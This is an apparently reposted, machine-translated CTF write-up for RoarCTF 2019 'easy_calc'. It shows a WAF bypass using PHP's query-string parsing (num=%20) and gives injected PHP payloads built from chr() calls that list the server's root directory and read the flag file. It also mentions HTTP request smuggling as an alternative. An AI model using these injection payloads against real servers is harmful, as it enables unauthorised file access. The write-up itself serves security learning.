当前位置:网站首页>ctf [RoarCTF 2019]easy_ calc

ctf [RoarCTF 2019]easy_ calc

2022-06-26 04:16:00 eliforsharon

I've learned something new, so record it
First, it's easy to find calc.php, however url Of get But I can't input characters , After the query, it is found that PHP String parsing features of .

utilize PHP String parsing features of

utilize PHP String parsing features of Bypass
This article is very detailed , And the subject of waf Only numbers are allowed , The input string... Is not allowed , use num=%20 Can bypass La .
Insert picture description here
Insert picture description here
Then you can go through chr To bypass .

View directory 

var_dump(scandir(chr(47)));

Insert picture description here

see flagg

var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)));

Insert picture description here

utilize HTTP Smuggling bypass

Vulnerability related articles
According to the vulnerability of inconsistent data received at the front and back end , I don't quite understand QAQ
Insert picture description here

原网站

版权声明
本文为[eliforsharon]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/02/202202180536406828.html

边栏推荐

猜你喜欢

随机推荐